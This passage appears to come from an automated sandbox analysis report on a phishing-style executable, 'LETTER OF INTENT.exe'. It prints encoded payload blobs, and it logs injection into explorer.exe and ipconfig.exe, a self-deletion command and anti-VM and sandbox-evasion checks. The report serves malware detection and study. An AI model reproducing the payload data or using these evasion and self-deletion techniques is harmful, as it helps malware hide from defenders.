AAATGACAANAAAAAAUAAACEAAE6YBAAAAICQCPMBAAAAEBMBXWAIAAACAYA33AIAAABANAYEFSBQILFNAOCKZA4EVSWSYNQJQIKYACECCUEZQAMAK6AAAAAFQAAARAABHWAIAAACAG6YBAAAAJ7QBC37ACCQGFQ3AAAT3AEAAABADPMAQAAAEC5M74AILA4WAKAAZBQVX2AT3AEAAABAXLABXWAIAAACP4AINBEWAKAAYBQVWIABLJ4BHWAQAAACAG6YCAAAAJ7QBC37ACEYECECCYOAAAJ5QEAAAAQBXWAQAAACBOWH6AEJQKEIFFQCQAFQMFMXAE6YCAAAAIF2YAN5QEAAAAT7ACEYGCEDCYBIAC4GCWEYAOKHQAADQAMBCQMIAAAFHGMAAAAFHUCBKAAJTAAQAHEAAAAAMAAABCAADOUBQAAA
            Source: 1.0.LETTER OF INTENT.exe.670000.7.unpack, DeltaEngine.BlogEngineSpamCommentRemover/Gui/MainWindow.csBase64 encoded string: 'JVNJAAADAAAAABAAAAAP77YAAC4AAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAOD65A4AFUBHGSDOABJTGSCVDINFZSA4DSN5TXEYLNEBRWC3TON52CAYTFEBZHK3RANFXCARCPKMQG233EMUXA2DIKEQAAAAAAAAAAAUCFAAAEYAIDAB5OWDDCAAAAAAAAAAAABYAAAIQQWAJQAAAHUAAAAADAAAAAAAAAAWUZAAAAAIAAAAAKAAAAAAAAAEAAEAAAAAACAAAAIAAAAAAAAAAAAQAAAAAAAAAAAAHAAAAAAAQAAAAAAAAAAMAEBBIAAAIAAAAQAAAAAAAQAAABAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAEJSAAAJ4AAAAAAUAAABKADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAABAQAAACIAAAAAAAAAAAAAAAAAAXHIZLYOQAAAADAPEAAAABAAAAAA6QAAAAAEAAAAAAAAAAAAAAAAAAAAAACAAAAMAXHE43SMMAAAAFIAMAAAAFAAAAAABAAAAAHYAAAAAAAAAAAAAAAAAAAAAAEAAAAIAXHEZLMN5RQAAAMAAAAAAGAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAEAAAAIIAAAAAAAAAAAAAAAAAAAAAAAAADZGIAAAAAAAAAJAAAAAACAACQB5CHAAABIUIAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEUARICMAAACQAAABQIBJIAUAAABQAFIABGMABAADQAAAAAEAAAEIACQFCWAAGFJDAAAQWTIBBPGQCDCNCQBIAAADAAKQAAAABGMAFACLQAAAAAIAAAEIACYFAE3YUAAAAUCYHA5NBUWQMBCGS2AAAAEGRMEYGFNDAAFQTA4VS4AACCEDBCB3PCUAAACQTBAJAQKAWAAAAUKAXAAAAUFQJAYNCQGAAAAFAABQ2LAFAAEIHC5MBGBYRA4D74BATBEIQSLOHAAIQMF2YCMDBCBQH7YCBGCQRBIW26CIWFAMQAAAKCMCBCBENFUAAAAITAUERUEIFCYIQLDTJFAMAAAAKAAIQKEYLFMABCCZKAAJTAAYANEAAAAADAAABCADTDIAAACQKAYQIG7AAAAQMBJYAABXRWAAABIUBYAAABIAAEKAJAAAAMBBIBIAAABQLA4UAIAAAAYBSQCIAAADCQCAAAADAYCBIA4AAABQNBFXR2AAABIPRJGQTAQIQI3Y6AAAAUG42CMCRCBJIAYAAABQACYUB6AAABIACULQAAIKBI3ZAAAAAUJRKAAAAAEZQAIABCAAAAACAAAARAAUCCAAABIBG6IQAAAFAUKYAAYVAAAAACMYAGAEHAAAAABIAAAIQAKBDAAAAUA3PEQAAACQKAIBI42IXLGIR64DBBMBI42IXLCGS2AAAAEGBMDIWCMCCWNQAAIIQJEIHMEDATELBCMCQQEIECEC5FHAJANXSKAAABIMFQGKZ7YARGBQRAYWAIFQNFMCASF2YBUABCBAXLAJQIEIEAKHGSF2Z7YBBN7QBCMDRCBZNXAJAEAUONELVSKABAAACWAAICMECWAARBAVAAEZQAQAG6AAAAADAAAARABZACAAAOAFAAATPEUAAACQY3IFRMDBLIUAAMAQIEMAAAAAAAAABAQBIE4AAACVXN4UAAAAKEMAAAAAAAAAHAQBIE4AAACVXFAUQAAAKQQUCUAAABIGREAZIFMAAACRIFQAAACQKAAEBRVQMBAD74AQW7YARGBARAQW24BQTAUVQAEIFFIABGMACAAUAAAAAA4AAAEIAANZAGAAAOAUCYAAABIUC2AAABJZS4AAABIFAMATPF4AAACTUCAAAAAILFMAAOKS6AIUBGAAABIAAAAQDPUAQAAAEAICH2AQAAACCUEZQAMAI2AAAAAEAAAARAANAH7QBBIDCYDAAOIXQAADQOMYAAAAKPIBRN7QBBMDSYFYAAJ5QCAAAAQBHWAQAAACBOWLTBMAAABQMFNLROA76AEGQSLAXAABHWAIAAACAE6YCAAAAIF2YOMFQAAAGBQVTQGID7YARGBARAQWBOAACPMAQAAAEC5MQE6YCAAAAI4YLAAAAMDBLC4AAE6YBAAAAIF2YAJ5QEAAAARZQWAAAAYGCWAAIFIAAAAATGABQA2QAAAAASAAACEAAICQGFQYQAA33AEAAABADPMBAAAAELEBHWAQAAACFQA33AEAAABADPMBAAAAELABHWAIAAACFS4YLAAAAMCZLGEAAG6YBAAAAIA33AIAAABCYAJ5QEAAAARMQG6YCAAAAIA33AEAAABCZAJ5QCAAAARMHGCYAAADAWKYAA4VAAAATGACAANAAAAAAUAAACEAAE6YBAAAAICQCPMBAAAAEBMBXWAIAAACAYA33AIAAABANAYEFSBQILFNAOCKZA4EVSWSYNQJQIKYACECCUEZQAMAK6AAAAAFQAAARAABHWAIAAACAG6YBAAAAJ7QBC37ACCQGFQ3AAAT3AEAAABADPMAQAAAEC5M74AILA4WAKAAZBQVX2AT3AEAAABAXLABXWAIAAACP4AINBEWAKAAYBQVWIABLJ4BHWAQAAACAG6YCAAAAJ7QBC37ACEYECECCYOAAAJ5QEAAAAQBXWAQAAACBOWH6AEJQKEIFFQCQAFQMFMXAE6YCAAAAIF2YAN5QEAAAAT7ACEYGCEDCYBIAC4GCWEYAOKHQAADQAMBCQMIAAAFHGMAAAAFHUCBKAAJTAAQAHEAAAAAMAAABCAADOUBQAAA
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_01
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeMutant created: \Sessions\1\BaseNamedObjects\xkJEJVLgvtGXaJ
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\explorer.exe
            Source: unknownProcess created: C:\Windows\explorer.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: LETTER OF INTENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: LETTER OF INTENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: ipconfig.pdb source: LETTER OF INTENT.exe, 00000001.00000002.307642624.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307957753.0000000001150000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: ipconfig.pdbGCTL source: LETTER OF INTENT.exe, 00000001.00000002.307642624.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307957753.0000000001150000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: LETTER OF INTENT.exe, 00000001.00000002.308765964.000000000129F000.00000040.00000800.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307985320.0000000001180000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: LETTER OF INTENT.exe, 00000001.00000002.308765964.000000000129F000.00000040.00000800.00020000.00000000.sdmp, LETTER OF INTENT.exe, 00000001.00000002.307985320.0000000001180000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_00FD4CA2 push esp; iretd 0_2_00FD4CA3
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_01924FD0 push E8000007h; ret 0_2_01925009
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_01924FEB push E8000007h; ret 0_2_01925009
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_0192500B push E8000007h; ret 0_2_01925009
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_061C4FEA push es; ret 0_2_061C5010
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_061C3CCD push ss; iretd 0_2_061C3CD3
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_061C5561 push es; ret 0_2_061C5594
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 0_2_061C4A23 push ss; iretd 0_2_061C4A24
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041B87C push eax; ret 1_2_0041B882
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041B812 push eax; ret 1_2_0041B818
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041B81B push eax; ret 1_2_0041B882
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00406890 push ebp; iretd 1_2_00406893
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0040F95C push esi; ret 1_2_0040F95F
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0040696E pushad ; iretd 1_2_0040698D
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041613A pushfd ; retf 1_2_0041613C
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041CCDC push FFFFFFEDh; ret 1_2_0041CCDE
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_00674CA2 push esp; iretd 1_2_00674CA3
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EED0D1 push ecx; ret 15_2_02EED0E4
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A06890 push ebp; iretd 15_2_02A06893
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1B812 push eax; ret 15_2_02A1B818
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1B81B push eax; ret 15_2_02A1B882
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1B87C push eax; ret 15_2_02A1B882
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1613A pushfd ; retf 15_2_02A1613C
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A0696E pushad ; iretd 15_2_02A0698D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A0F95C push esi; ret 15_2_02A0F95F
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1B7C5 push eax; ret 15_2_02A1B818
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02A1CCDC push FFFFFFEDh; ret 15_2_02A1CCDE
            Source: initial sampleStatic PE information: section name: .text entropy: 7.64198906691

            Persistence and Installation Behavior

            barindex
            Uses ipconfig to lookup or modify the Windows network settings
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

            Hooking and other Techniques for Hiding and Protection

            barindex
            Self deletion via cmd delete
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del "C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del "C:\Users\user\Desktop\LETTER OF INTENT.exe"Jump to behavior
            Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: 0.2.LETTER OF INTENT.exe.342a3e4.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: LETTER OF INTENT.exe PID: 6272, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002A08604 second address: 0000000002A0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002A0898E second address: 0000000002A08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe TID: 6276Thread sleep time: -33322s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe TID: 6304Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 8.1 %
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeThread delayed: delay time: 33322Jump to behavior
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 00000003.00000000.257522240.0000000008BB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000017.00000000.434106783.0000000006442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.272293845.000000000891C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000017.00000003.438430184.0000000007E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
